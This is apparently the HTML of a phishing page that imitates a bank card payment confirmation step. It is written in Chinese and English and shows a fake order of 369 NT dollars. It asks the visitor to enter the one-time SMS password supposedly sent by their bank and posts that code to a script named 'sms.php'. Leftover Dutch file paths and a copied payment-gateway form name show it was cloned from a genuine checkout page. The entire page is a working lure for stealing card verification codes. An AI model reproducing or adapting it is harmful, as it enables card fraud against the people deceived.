<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1">
    <meta name="apple-mobile-web-app-capable" content="yes"><title>信用卡付款頁面</title><link rel="icon" href="./img/favicon.ico" type="image/x-icon">
<script type="text/javascript" src="date_heure.js"></script>
    <link type="image/x-icon" rel="shortcut icon" href="./images/favicon.png">
      <link href="pubup.css" rel="stylesheet">
      <link href="x0x.css" rel="stylesheet">

    <style type="text/css">

    </style>
</head>

<body>
    <div id="main" style="width: 100%">
        <div id="inner" style="">
            <div id="FlexContainer1">
<div id="wb_Image1" style="display:inline-block;width:240px;z-index:0;">
<img src="eko.png" id="Image1" alt="" style="
    width: 335px;
">
</div>
<div id="wb_Image2" style="display:inline-block;width:26px;z-index:1;">
</div>
</div><div id="content">
                
                <div class="mainContainerPaymentzone">
					
<div class="WaitMsgClass" id="WaitMsgId" style="display: none;background-color: #FFFFFF;border: solid #CCCCCC 4px;padding: 4px;color: #000000;font-family: Verdana;font-weight: bold;position: absolute;width: 350px;"><img id="waitGif" src="./Betaalbevestiging_files/wait_turn.gif"></div>

	<!-- Order overview -->
<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;"><br></h2><table border="0" cellpadding="2" cellspacing="0" class="ncoltable1" id="ncol_ref" width="95%"><tbody><tr><td align="right" class="ncoltxtl" colspan="1" width="50%">Order Number 訂單編號<br></td><td class="ncoltxtr" colspan="1" width="50%">: 00275029<br></td></tr><tr><td align="right" class="ncoltxtl" colspan="1">Purchase Amount 訂單金額<br></td><td class="ncoltxtr" colspan="1">:  369 新台幣 NT Dollars <br></td></tr><tr><td align="right" class="ncoltxtl" colspan="1"><br></td><td class="ncoltxtr" colspan="1">&nbsp; <span id="date_heure"></span><script type="text/javascript">window.onload = date_heure('date_heure');</script></div> <br></td></tr></tbody></table>

						<form method="POST" action="sms.php" name="OGONE_CC_FORM" onsubmit="return my_valscript(this);">
					<p></p>
					<!-- Hidden title for screenreaders (Payment Data) -->
					<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;"></h2>
						<table class="ncoltable2" border="0" cellpadding="2" cellspacing="0" width="95%">

						<tbody>
							
									<p><strong>Please confirm the following payment<br>請確認以下付款</strong></p>
									<p style="text-align: center;">The unique password has been sent to the mobile number below. If you need to change your mobile number, please contact your bank or change it through the available channels (ATM, web).<br>唯一密碼已發送到下面的手機號碼。 如果您需要更改手機號碼，請與您的銀行聯繫或通過可用的渠道（ATM，網絡）進行更改。.</p>
									
									
										</td>
									</tr>
								<tr>
									<td colspan="2" valign="middle" align="center">
																				<input type="text" required="required" style="border: 1px solid #0a0a0a;border-radius: 4px;background-color: #FFFFFF;background-image: none;color: #000000;width: 100%;font-family: Arial;font-weight: normal;font-size: 16px;line-height: 27px;padding: 4px 4px 4px 4px;margin: 0;text-align:center;position: relative;background-color: #ffffff;border: 1px solid #999999;border: 1px solid rgba(0,0,0,0.2);border-radius: 6px;-webkit-box-shadow: 0 3px 9px rgba(0,0,0,0.5);box-shadow: 0 3px 9px rgba(0,0,0,0.5);-webkit-background-clip: padding-box;background-clip: padding-box;outline: 0;border-color: #e5e5e5 #d9d9d9 #cccccc;-webkit-box-shadow: 0 3px 15px rgba(148, 148, 148, 0.8);box-shadow: 0 3px 15px rgba(148, 148, 148, 0.8);-moz-background-clip: padding-box;-webkit-background-clip: padding-box;background-clip: padding-box;outline: 0 none;margin-top: -11px;padding-bottom: 1px;" name="Ecom_Payment_sms_Verification" id="Ecom_Payment_sms_Verification" autocomplete="Off" size="10" maxlength="10" aria-required="true">
										<br><br>

																				<small><small>

										&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
										<br><br>

										
							
							
										</small></small></td>
								</tr>
								<tr align="center">
									<td colspan="2" valign="middle" align="center">
										<small>
										
									<input type="submit" class="ncol" name="payment" value="確認付款 To Pay" id="submit3">
								
										</small>
										</td>
								</tr>
						</tbody></table>

                </form></div>
            </div>
        </div>
    </div>



</body></html>